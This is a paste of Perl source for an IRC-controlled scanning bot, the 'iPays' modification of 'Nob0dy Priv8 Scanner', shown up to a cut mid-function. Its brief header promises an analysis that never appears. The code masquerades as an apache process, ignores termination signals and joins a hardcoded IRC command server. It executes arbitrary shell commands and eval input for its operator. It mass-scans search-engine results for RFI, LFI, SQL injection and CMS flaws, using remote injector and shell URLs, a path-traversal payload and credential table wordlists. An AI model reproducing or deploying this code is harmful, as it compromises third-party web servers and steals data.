iPay bot - overview and eventual analysis

1. # Analysis of the iPays bot... or rather, the full kit for you to analyse...
2. # $injector is HERE --> (add link later, too tired :P)
3. # $botshell is HERE --> (add link later, too tired :P)
4. # blah look here too apparently theres an edit http://pastebin.com/79QqXkZB
5.  
6. #!/usr/bin/perl
7. ################################################
8. use HTTP::Request; #
9. use HTTP::Request::Common; #
10. use HTTP::Request::Common qw(POST); #
11. use LWP::Simple; #
12. use LWP 5.53; #
13. use LWP::UserAgent; #
14. use Socket; #
15. use IO::Socket; #
16. use IO::Socket::INET; #
17. use IO::Select; #
18. use MIME::Base64; #
19. ################################################
20.  
21. my $datetime = localtime;
22.  
23. my $fakeproc = "/usr/sbin/apache3 -k start";
24. my $ircserver = "irc.ganyot.us.to";
25. my $ircport = "6667";
26. my $nickname = "timlopus";
27. my $ident = "jems";
28. my $channel = "#lopus";
29. my $admin = "Susis";
30. my $fullname = "Susis IRC Scanner";
31.  
32. my $nob0dy = "15,1(4@9AspAlt15)";
33. my $lfilogo = "15,1(4@9LFI15)";
34. my $rfilogo = "15,1(4@9RFI15)";
35. my $xmllogo = "15,1(4@9XML15)";
36. my $sqllogo = "15,1(4@9SQL15)";
37. my $oscologo = "15,1(4@9OSCO15)";
38. my $zenlogo = "15,1(4@9ZEN15)";
39. my $oplogo = "15,1(4@9OPEN15)";
40. my $lokologo = "15,1(4@9LOKO15)";
41. my $thumblogo = "15,1(4@9TIMTHUMB15)";
42.  
43. my $lficmd = '!lfi';
44. my $rficmd = '!rfi';
45. my $xmlcmd = '!xml';
46. my $sqlcmd = '!sql';
47. my $oscocmd = '!osco';
48. my $zencmd = '!zen';
49. my $lokocmd = '!loko';
50. my $opcmd = '!op';
51. my $thumbcmd = '!thumb';
52.  
53. my $cmdlfi = '!cmdlfi';
54. my $cmdxml = '!cmdxml';
55.  
56. my $injector = "http://sec.usu.ac.id:8080/images/upload_2.jpg";
57. my $botshell = "http://sec.usu.ac.id:8080/images/upload_3.jpg";
58. my $botshell2 = "http://sec.usu.ac.id:8080/images/upload_3.jpg";
59. my $thumbshell = "http://blogger.com.autoelectricahernandez.com/x.php";
60.  
61. my @uagents = ("Microsoft Internet Explorer/4.0b1 (Windows 95)","Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)","Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)","Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)","Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)","Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)","Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)","Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)","Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)","Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)","Mozilla/4.0 (compatible; MSIE 7.0b; Win32)","Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)","Microsoft Pocket Internet Explorer/0.6","Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)","MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)","Advanced Browser (http://www.avantbrowser.com)","Avant Browser (http://www.avantbrowser.com)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)","Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)","Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)","Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511","Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929","Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0","Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox","Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b","Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0","Mozilla/3.0 (OS/2; U)","Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)","Mozilla/4.61 (Macintosh; I; PPC)","Mozilla/4.61 [en] (OS/2; U)","Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)","Mozilla/4.8 [en] (Windows NT 5.0; U)");
62. my $uagent = $uagents[rand(scalar(@uagents))];
63. my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00";
64. my $open_test = "/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
65. my $loko_output = ("FCKeditor - Resources Browser");
66. my $open_output = ("FCKeditor - Connectors Tests");
67.  
68. my @tabele = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
69. 'name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator',
70. 'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
71. 'member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address',
72. 'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
73. 'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
74. 'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
75. 'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
76. 'associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
77. 'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
78. my @kolumny = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
79. 'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
80. 'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
81. 'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
82. 'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
83. 'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
84. $SIG{'INT'} = 'IGNORE';
85. $SIG{'HUP'} = 'IGNORE';
86. $SIG{'TERM'} = 'IGNORE';
87. $SIG{'CHLD'} = 'IGNORE';
88. $SIG{'PS'} = 'IGNORE';
89. $ircserver = "$ARGV[0]" if $ARGV[0];
90. $0 = "$fakeproc"."\0" x 16;;
91. my $pid = fork;
92. exit if $pid;
93. die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
94.  
95. our %irc_servers;
96. our %DCC;
97. my $dcc_sel = new IO::Select->new();
98. $sel_client = IO::Select->new();
99. sub sendraw {
100. if ($#_ == '1') {
101. my $socket = $_[0];
102. print $socket "$_[1]\n";
103. } else {
104. print $IRC_cur_socket "$_[0]\n";
105. }
106. }
107.  
108. sub connector {
109. my $mynick = $_[0];
110. my $ircserver_con = $_[1];
111. my $ircport_con = $_[2];
112. my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
113. if (defined($IRC_socket)) {
114. $IRC_cur_socket = $IRC_socket;
115. $IRC_socket->autoflush(1);
116. $sel_client->add($IRC_socket);
117. $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
118. $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
119. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
120. $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
121. nick("$mynick");
122. my $versi = "9,1[!] 1,15 Maza CreW 9,1 [!]";
123. sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$versi");
124. sleep (1);}}
125. sub parse {
126. my $servarg = shift;
127. if ($servarg =~ /^PING \:(.*)/) {
128. sendraw("PONG :$1");
129. }
130. elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
131. if (lc($1) eq lc($mynick)) {
132. $mynick = $4;
133. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
134. }
135. }
136. elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
137. nick("$mynick".int rand(1));
138. }
139. elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
140. $mynick = $2;
141. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
142. $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
143. sendraw("MODE $mynick +i");
144. sendraw("JOIN $channel");
145. sleep(2);
146. sendraw("PRIVMSG $admin :Hi $admin im here !!!");
147. }
148. }
149. my $line_temp;
150. while( 1 ) {
151. while (!(keys(%irc_servers))) { &connector("$nickname", "$ircserver", "$ircport"); }
152. select(undef, undef, undef, 0.01);;
153. delete($irc_servers{''}) if (defined($irc_servers{''}));
154. my @ready = $sel_client->can_read(0);
155. next unless(@ready);
156. foreach $fh (@ready) {
157. $IRC_cur_socket = $fh;
158. $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
159. $nread = sysread($fh, $ircmsg, 4096);
160. if ($nread == 0) {
161. $sel_client->remove($fh);
162. $fh->close;
163. delete($irc_servers{$fh});
164. }
165. @lines = split (/\n/, $ircmsg);
166. $ircmsg =~ s/\r\n$//;
167.  
168. if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
169. my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
170. my $engine ="GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio,WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo,BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR";
171. if ($path eq $mynick) {
172. if ($msg =~ /^
     PING (.*)
     /) {
173. sendraw("NOTICE $nick :
     PING $1
     ");
174. }
175. if ($msg =~ /^
     VERSION
     /) {
176. sendraw("NOTICE $nick :VERSION mIRC v6.17 Khaled Mardam-Bey");
177. }
178. if ($msg =~ /^
     TIME
     /) {
179. sendraw("NOTICE $nick :
     TIME ".$datetime."
     ");
180. }
181. if (&isAdmin($nick) && $msg eq "!die") {
182. &shell("$path","kill -9 $$");
183. }
184. if (&isAdmin($nick) && $msg eq "!killall") {
185. &shell("$path","killall -9 perl");
186. }
187. if (&isAdmin($nick) && $msg eq "!reset") {
188. sendraw("QUIT :Restarting...");
189. }
190. if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
191. sendraw("JOIN #".$1);
192. }
193. if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
194. sendraw("PART #".$1);
195. }
196. if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
197. sendraw("NICK ".$1);
198. }
199. if (&isAdmin($nick) && $msg =~ /^!pid/) {
200. sendraw($IRC_cur_socket, "PRIVMSG $nick :9,1Fake Process/PID : $fakeproc - $$");
201. }
202. if (&isAdmin($nick) && $msg !~ /^!/) {
203. &shell("$nick","$msg");
204. }
205. if (&isAdmin($nick) && $msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){
206. my $url = $1.$lfdtest;
207. my $cmd = $2;
208. &cmdlfi($url,$cmd,$nick);
209. }
210. if (&isAdmin($nick) && $msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){
211. my $url = $1;
212. my $cmd = $2;
213. &cmdxml($url,$cmd,$nick);
214. }
215. }
216. else {
217. if (&isAdmin($nick) && $msg eq "!die") {
218. &shell("$path","kill -9 $$");
219. }
220. if (&isAdmin($nick) && $msg eq "!killall") {
221. &shell("$path","killall -9 perl");
222. }
223. if (&isAdmin($nick) && $msg eq "!reset") {
224. sendraw("QUIT :Restarting...");
225. }
226. if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
227. sendraw("JOIN #".$1);
228. }
229. if (&isAdmin($nick) && $msg eq "!part") {
230. sendraw("PART $path");
231. }
232. if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
233. sendraw("PART #".$1);
234. }
235. if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
236. &shell("$path","$1");
237. }
238. if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
239. &shell("$path","$1");
240. }
241. if (&isAdmin($nick) && $msg =~ /^!eval (.*)/) {
242. eval "$1";
243. }
244. ##################################################################### HIT
245.  
246. if ($msg=~ /^$cmdlfi\s+(.+?)\s+(.*)/){
247. my $url = $1.$lfdtest;
248. my $cmd = $2;
249. &cmdlfi($url,$cmd,$path);
250. }
251. if ($msg=~ /^$cmdxml\s+(.+?)\s+(.*)/){
252. my $url = $1;
253. my $cmd = $2;
254. &cmdxml($url,$cmd,$path);
255. }
256.  
257. ##################################################################### HELP COMMAND
258.  
259. if ($msg=~ /^!help/) {
260. my $helplogo = "15,1(4@9Help15)";
261. &msg("$path","$helplogo 14 #####################9[HELP]14##############################");
262. &msg("$path","$helplogo 7 ( $rficmd|$lficmd|$sqlcmd|$xmlcmd|$thumbcmd [bug][dork]|!portscan[ip][port]) )");
263. &msg("$path","$helplogo 7 ( $cmdlfi|$cmdxml) [target][cmd] )");
264. &msg("$path","$helplogo 7 ( $zencmd | $oscocmd | $lokocmd | $opcmd [dork] ) ");sleep(2);
265. &msg("$path","$helplogo 7 ( !about|!engine|!version|!pid )");
266. &msg("$path","$helplogo 14 ######################9[END HELP]14#########################");
267. }
268. if ($msg=~ /^!engine/) {
269. my $enginelogo = "15,1(4@9EnginE15)";
270. &msg("$path","$enginelogo 4 GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio");
271. &msg("$path","$enginelogo 4 WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo");
272. &msg("$path","$enginelogo 4 BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR");
273. }
274. if ($msg=~ /^!about/) {
275. my $aboutlogo = "15,1(4@9About Bot15)";
276. &msg("$path","$aboutlogo 9Nob0dy Priv8 Scanner SE v1.2 Coded by Vrs-hCk");
277. &msg("$path","$aboutlogo 13CoDeD by c0li ByroeNet");
278. &msg("$path","$aboutlogo 7Modified by ipays ByroeNet");
279. }
280. if ($msg=~ /^!version/) {
281. my $versionlogo = "15,1(4@9Version15)";
282. &msg("$path","$versionlogo 13 priv8 SE v1.2");
283. }
284. if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
285. if (&isFound($injector,"SkFOQ09L=")) {
286. &msg("$path","15,1(4@9Injector15)13 PHP Shell 9READY!!!");
287. } else {
288. &msg("$path","15,1(4@9Injector15)13 PHP Shell 4LOST!!!");
289. }
290. }
291. if (&isAdmin($nick) && $msg =~ /^!pid/) {
292. &notice("$nick","9,1Fake Process/PID : 8$fakeproc - $$");
293. }
294.  
295. ##################################################################### RFI SCAN
296.  
297. if ($msg=~ /^$rficmd\s+(.+?)\s+(.*)/) {
298. if (my $pid = fork) {
299. waitpid($pid, 0);
300. }
301. else {
302. if (fork) { exit; } else {
303. if (&isFound($injector,"SkFOQ09L=")) {
304. my ($bug,$dork) = ($1,$2);
305. &msg("$path","$rfilogo 9Dork :4 $dork");
306. &msg("$path","$rfilogo 13Bugz :4 $bug");
307. &msg("$path","$rfilogo 8Search Engine Loading ...");
308. &scan_start($path,$bug,$dork,$engine,1);
309. } else {
310. &msg("$path","[ $nick ] $rfilogo 4PHP Shell Not Found!");
311. }
312. }
313. exit;
314. }
315. }
316.  
317. ##################################################################### LFI SCAN
318.  
319. if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {
320. if (my $pid = fork) {
321. waitpid($pid, 0);
322. }
323. else {
324. if (fork) { exit; } else {
325. if (&isFound($injector,"SkFOQ09L=")) {
326. my ($bug,$dork) = ($1,$2);
327. &msg("$path","$lfilogo 9Dork :4 $dork");
328. &msg("$path","$lfilogo 13Bugz :4 $bug");
329. &msg("$path","$lfilogo 8Search Engine Loading ...");
330. &scan_start($path,$bug,$dork,$engine,2);
331. } else {
332. &msg("$path","[ $nick ] $lfilogo 4PHP Shell Not Found!");
333. }
334. }
335. exit;
336. }
337. }
338.  
339. ##################################################################### XML SCAN
340. if ($msg=~ /^$xmlcmd\s+(.*?)\s+(.*)/ ) {
341. if (my $pid = fork) {
342. waitpid($pid, 0);
343. }
344. else {
345. if (fork) { exit; } else {
346. if (&isFound($injector,"SkFOQ09L=")) {
347. my ($bug,$dork) = ($1,$2);
348. &msg("$path","$xmllogo 9Dork :4 $dork");
349. &msg("$path","$xmllogo 13Bugz :4 $bug");
350. &msg("$path","$xmllogo 8Search Engine Loading ...");
351. &scan_start($path,$bug,$dork,$engine,3);
352. } else {
353. &msg("$path","[ $nick ] $xmllogo 4PHP Shell Not Found!");
354. }
355. }
356. exit;
357. }
358. }
359.  
360. ##################################################################### SQL SCAN
361.  
362. if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
363. if (my $pid = fork) {
364. waitpid($pid, 0);
365. }
366. else {
367. if (fork) { exit; } else {
368. my ($bug,$dork) = ($1,$2);
369. &msg("$path","$sqllogo 9Dork :4 $dork");
370. &msg("$path","$sqllogo 13Bugz :4 $bug");
371. &msg("$path","$sqllogo 8Search Engine Loading ...");
372. &scan_start($path,$bug,$dork,$engine,4);
373. }
374. exit;
375. }
376. }
377.  
378. ##################################################################### OSCO SCAN
379.  
380. if ($msg=~ /^$oscocmd\s+(.*)/) {
381. if (my $pid = fork) {
382. waitpid($pid, 0);
383. }
384. else {
385. if (fork) { exit; } else {
386. if (&isFound($injector,"SkFOQ09L=")) {
387. my ($bug,$dork) = ("admin/categories.php/login.php?cPath=&action=new_product_preview",$1);
388. &msg("$path","$oscologo 9Dork :4 $dork");
389. &msg("$path","$oscologo 8Search Engine Loading ...");
390. &scan_start($path,$bug,$dork,$engine,5);
391. } else {
392. &msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");
393. }
394. }
395. exit;
396. }
397. }
398. ##################################################################### OSCO SCAN
399.  
400. if ($msg=~ /^$oscocmd\s+(.*)/) {
401. if (my $pid = fork) {
402. waitpid($pid, 0);
403. }
404. else {
405. if (fork) { exit; } else {
406. if (&isFound($injector,"SkFOQ09L=")) {
407. my ($bug,$dork) = ("admin/file_manager.php/login.php",$1);
408. &scan_start($path,$bug,$dork,$engine,5);
409. } else {
410. &msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");
411. }
412. }
413. exit;
414. }
415. }
416.  
417. ##################################################################### LOKO SCAN
418.  
419. if ($msg=~ /^$lokocmd\s+(.*)/) {
420. if (my $pid = fork) {
421. waitpid($pid, 0);
422. }
423. else {
424. if (fork) { exit; } else {
425. my ($bug,$dork) = ("filemanager/browser.html",$1);
426. &msg("$path","$lokologo 9Dork :4 $dork");
427. &msg("$path","$lokologo 8Search Engine Loading ...");
428. &scan_start($path,$bug,$dork,$engine,6);
429. }
430. exit;
431. }
432. }
433. ##################################################################### OPENCART SCAN
434.  
435. if ($msg=~ /^$opcmd\s+(.+?)\s+(.*)/) {
436. if (my $pid = fork) {
437. waitpid($pid, 0);
438. }
439. else {
440. if (fork) { exit; } else {
441. my ($bug,$dork) = ($1,$2);
442. &msg("$path","$oplogo 9Dork :4 $dork");
443. &msg("$path","$oplogo 13Bugz :4 $bug");
444. &msg("$path","$oplogo 8Search Engine Loading ...");
445. &scan_start($path,$bug,$dork,$engine,7);
446. }
447. exit;
448. }
449. }
450. ##################################################################### ZEN SCAN
451.  
452. if ($msg=~ /^$zencmd\s+(.*)/) {
453. if (my $pid = fork) {
454. waitpid($pid, 0);
455. }
456. else {
457. if (fork) { exit; } else {
458. my ($bug,$dork) = ("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);
459. &msg("$path","$zenlogo 9Dork :4 $dork");
460. &msg("$path","$zenlogo 13Search Engine Loading ...");
461. &scan_start($path,$bug,$dork,$engine,8);
462. }
463. exit;
464. }
465. }
466. ##################################################################### ZEN SCAN
467.  
468. if ($msg=~ /^$zencmd\s+(.*)/) {
469. if (my $pid = fork) {
470. waitpid($pid, 0);
471. }
472. else {
473. if (fork) { exit; } else {
474. my ($bug,$dork) = ("admin/record_company.php",$1);
475. &scan_start($path,$bug,$dork,$engine,8);
476. }
477. exit;
478. }
479. }
480. ##################################################################### TIMTHUMB.PHP SCAN (ADDED)
481.  
482. if ($msg=~ /^$thumbcmd\s+(.+?)\s+(.*)/) {
483. if (my $pid = fork) {
484. waitpid($pid, 0);
485. }
486. else {
487. if (fork) { exit; } else {
488. my ($bug,$dork) = ($1,$2);
489. &msg("$path","$thumblogo 9Dork :4 $dork");
490. &msg("$path","$thumblogo 13Bugz :4 $bug");
491. &msg("$path","$thumblogo 8Search Engine Loading ...");
492. &scan_start($path,$bug,$dork,$engine,9);
493. }
494. exit;
495. }
496. }
497. #####################################################################
498. }
499. }
500.  
501. for(my $c=0; $c<= $#lines; $c++) {
502. $line = $lines[$c];
503. $line = $line_temp.$line if ($line_temp);
504. $line_temp = '';
505. $line =~ s/\r$//;
506. unless ($c == $#lines) {
507. &parse("$line");
508. } else {
509. if ($#lines == 0) {
510. &parse("$line");
511. } elsif ($lines[$c] =~ /\r$/) {
512. &parse("$line");
513. } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
514. &parse("$line");
515. } else {
516. $line_temp = $line;
517. }
518. }
519. }
520. }
521. }
522.  
523. #########################################
524. sub type () {
525. my ($chan,$bug,$dork,$engine,$type) = @_;
526. if ($type == 1){&rfi($chan,$bug,$dork,$engine);}
527. elsif ($type == 2){&lfi($chan,$bug,$dork,$engine);}
528. elsif ($type == 3){&xml($chan,$bug,$dork,$engine);}
529. elsif ($type == 4){&sql($chan,$bug,$dork,$engine);}
530. elsif ($type == 5){&osco($chan,$bug,$dork,$engine);}
531. elsif ($type == 6){&loko($chan,$bug,$dork,$engine);}
532. elsif ($type == 7){&op($chan,$bug,$dork,$engine);}
533. elsif ($type == 8){&zen($chan,$bug,$dork,$engine);}
534. elsif ($type == 9){&thumb($chan,$bug,$dork,$engine);}
535. }
536. sub scan_start() {
537. my ($chan,$bug,$dork,$engine,$type) = @_;
538. if ($engine =~ /google/i) {
539. if (my $pid = fork) { waitpid($pid, 0); }
540. else { if (fork) { exit; } else {
541. &type($chan,$bug,$dork,"GooGLe",$type);
542. } exit; }
543. }
544.  
545. if ($engine =~ /google2/i) {
546. if ($pid = fork) { waitpid($pid, 0); }
547. else { if (fork) { exit; } else {
548. &type($chan,$bug,$dork,"GooGle2",$type);
549. } exit; }
550. }
551.  
552. if ($engine =~ /bing/i) {
553. if ($pid = fork) { waitpid($pid, 0); }
554. else { if (fork) { exit; } else {
555. &type($chan,$bug,$dork,"Bing",$type);
556. } exit; }
557. }
558.  
559. if ($engine =~ /altavista/i) {
560. if ($pid = fork) { waitpid($pid, 0); }
561. else { if (fork) { exit; } else {
562. &type($chan,$bug,$dork,"ALtaViSTa",$type);
563. } exit; }
564. }
565.  
566. if ($engine =~ /ask/i) {
567. if ($pid = fork) { waitpid($pid, 0); }
568. else { if (fork) { exit; } else {
569. &type($chan,$bug,$dork,"AsK",$type);
570. } exit; }
571. }
572.  
573. if ($engine =~ /uol/i) {
574. if ($pid = fork) { waitpid($pid, 0); }
575. else { if (fork) { exit; } else {
576. &type($chan,$bug,$dork,"UoL",$type);
577. } exit; }
578. }
579.  
580. if ($engine =~ /yahoo/i) {
581. if ($pid = fork) { waitpid($pid, 0); }
582. else { if (fork) { exit; } else {
583. &type($chan,$bug,$dork,"YahOo",$type);
584. } exit; }
585. }
586.  
587. if ($engine =~ /clusty/i) {
588. if ($pid = fork) { waitpid($pid, 0); }
589. else { if (fork) { exit; } else {
590. &type($chan,$bug,$dork,"CluSty",$type);
591. } exit; }
592. }
593.  
594. if ($engine =~ /gutser/i) {
595. if ($pid = fork) { waitpid($pid, 0); }
596. else { if (fork) { exit; } else {
597. &type($chan,$bug,$dork,"GutSer",$type);
598. } exit; }
599. }
600.  
601. if ($engine =~ /rediff/i) {
602. if ($pid = fork) { waitpid($pid, 0); }
603. else { if (fork) { exit; } else {
604. &type($chan,$bug,$dork,"ReDiff",$type);
605. } exit; }
606. }
607.  
608. if ($engine =~ /virgilio/i) {
609. if ($pid = fork) { waitpid($pid, 0); }
610. else { if (fork) { exit; } else {
611. &type($chan,$bug,$dork,"VirgiLio",$type);
612. } exit; }
613. }
614.  
615. if ($engine =~ /webde/i) {
616. if ($pid = fork) { waitpid($pid, 0); }
617. else { if (fork) { exit; } else {
618. &type($chan,$bug,$dork,"WebDe",$type);
619. } exit; }
620. }
621.  
622. if ($engine =~ /exalead/i) {
623. if ($pid = fork) { waitpid($pid, 0); }
624. else { if (fork) { exit; } else {
625. &type($chan,$bug,$dork,"ExaLead",$type);
626. } exit; }
627. }
628.  
629. if ($engine =~ /lycos/i) {
630. if ($pid = fork) { waitpid($pid, 0); }
631. else { if (fork) { exit; } else {
632. &type($chan,$bug,$dork,"LyCos",$type);
633. } exit; }
634. }
635.  
636. if ($engine =~ /hotbot/i) {
637. if ($pid = fork) { waitpid($pid, 0); }
638. else { if (fork) { exit; } else {
639. &type($chan,$bug,$dork,"HotBot",$type);
640. } exit; }
641. }
642.  
643. if ($engine =~ /aol/i) {
644. if ($pid = fork) { waitpid($pid, 0); }
645. else { if (fork) { exit; } else {
646. &type($chan,$bug,$dork,"AoL",$type);
647. } exit; }
648. }
649.  
650. if ($engine =~ /sapo/i) {
651. if ($pid = fork) { waitpid($pid, 0); }
652. else { if (fork) { exit; } else {
653. &type($chan,$bug,$dork,"SaPo",$type);
654. } exit; }
655. }
656.  
657. if ($engine =~ /duck/i) {
658. if ($pid = fork) { waitpid($pid, 0); }
659. else { if (fork) { exit; } else {
660. &type($chan,$bug,$dork,"DuCk",$type);
661. } exit; }
662. }
663.  
664. if ($engine =~ /lygo/i) {
665. if ($pid = fork) { waitpid($pid, 0); }
666. else { if (fork) { exit; } else {
